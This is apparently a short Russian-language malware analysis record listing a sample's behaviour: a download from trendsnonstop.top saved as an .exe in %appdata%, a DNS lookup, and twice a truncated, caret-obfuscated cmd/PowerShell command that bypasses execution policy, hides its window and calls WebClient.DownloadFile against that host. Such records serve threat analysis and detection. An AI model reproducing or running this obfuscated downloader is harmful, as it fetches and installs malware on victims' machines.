Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWE^r^sH^ElL.EXE^ ^-EX^EcutionpoLicy b^Y^pA^SS^ ^-Nop^rOFiLe -^WInDo^WST^yLe^ hI^Dd^E^n (Ne^w-^ObJe^cT Sy^s^TEm.^neT^.We^b^Cl^ieNT^)^.D^oWnL^Oa^D^f^I^l^e('http://trendsnonstop....
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /C "POWE^r^sH^ElL.EXE^ ^-EX^EcutionpoLicy b^Y^pA^SS^ ^-Nop^rOFiLe -^WInDo^WST^yLe^ hI^Dd^E^n (Ne^w-^ObJe^cT Sy^s^TEm.^neT^.We^b^Cl^ieNT^)^.D^oWnL^Oa^D^f^I^l^e('http://trendsnonstop....' (со скрытым окном)